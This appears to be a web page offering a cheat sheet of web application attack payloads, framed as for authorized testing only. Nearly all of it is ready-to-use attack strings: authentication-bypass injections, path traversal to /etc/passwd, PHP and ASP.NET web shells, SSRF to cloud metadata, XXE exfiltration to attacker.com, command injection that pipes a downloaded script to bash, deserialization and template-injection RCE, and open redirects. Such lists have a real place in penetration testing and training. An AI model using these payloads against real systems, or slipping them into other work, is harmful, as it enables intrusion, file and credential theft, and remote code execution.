Loading...
Loading...
Comprehensive collection of web application security vulnerabilities and attack vectors
Educational Purpose Only
These techniques are for authorized security testing only. Unauthorized access is illegal.
Common authentication bypass techniques
Classic SQL injection to bypass login
admin' OR '1'='1' --NoSQL injection for MongoDB authentication bypass
{"$ne": null}Modify JWT header to bypass signature verification
{"alg":"none","typ":"JWT"}Force victim to use known session ID
Set-Cookie: PHPSESSID=attacker_session_idPath traversal and file inclusion techniques
Read sensitive files using relative paths
../../../../../../etc/passwdBypass filters using URL encoding
..%2F..%2F..%2Fetc%2FpasswdDouble encode to bypass WAF
..%252F..%252F..%252Fetc%252FpasswdNull byte injection to bypass extension checks
../../etc/passwd%00.jpgWindows path traversal
..\..\..\windows\system32\config\samMalicious file upload bypasses
Simple PHP web shell
<?php system($_GET["cmd"]); ?>Bypass extension whitelist
shell.php.jpgNull byte in filename
shell.php%00.jpgAdd magic bytes to bypass MIME checks
GIF89a<?php system($_GET["cmd"]); ?>ASP.NET web shell
<%@ Page Language="C#" %><% Response.Write(Request.QueryString["cmd"]); %>SSRF payloads and bypass techniques
Access internal services
http://127.0.0.1:8080/adminAlternative localhost representations
http://0.0.0.0/ or http://[::1]/AWS metadata endpoint
http://169.254.169.254/latest/meta-data/Bypass blacklist with URL tricks
http://127.0.0.1@example.comDNS rebinding attack
http://rebind.example.comXXE injection payloads
Read local files via XXE
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>Exfiltrate data via out-of-band
<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?x=%file;'>">XXE through SVG upload
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><text>&xxe;</text></svg>External DTD for XXE
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>OS command injection payloads
Chain commands with semicolon
127.0.0.1; cat /etc/passwdPipe output to command
127.0.0.1 | whoamiExecute if previous succeeds
127.0.0.1 && idBacktick command substitution
ping -c 1 `whoami`.attacker.comDownload and execute script
$(curl attacker.com/shell.sh | bash)Deserialization attack payloads
Python pickle RCE
cos\nsystem\n(S'id'\ntR.Java deserialization gadget
rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZQ==PHP object injection
O:8:"stdClass":1:{s:4:"code";s:10:"phpinfo();";}Node.js deserialization RCE
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('calc');}()"}LDAP injection payloads
Bypass LDAP authentication
*)(uid=*))(|(uid=*LDAP OR injection
admin)(|(password=*)Enumerate LDAP objects
*)(objectClass=*Server-Side Template Injection (SSTI)
Python Jinja2 template injection
{{ ''.__class__.__mro__[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate() }}PHP Twig template injection
{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}Java FreeMarker injection
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }Node.js Handlebars injection
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{/with}}{{/with}}{{/with}}Open redirect payloads
Direct redirect parameter
?redirect=https://evil.comProtocol-relative URL
?url=//evil.comEncoded redirect
?next=%2F%2Fevil.comJavaScript protocol redirect
?redirect=javascript:alert(document.domain)Need More Resources?
Check out our security tools, learning roadmaps, and blog posts for in-depth tutorials.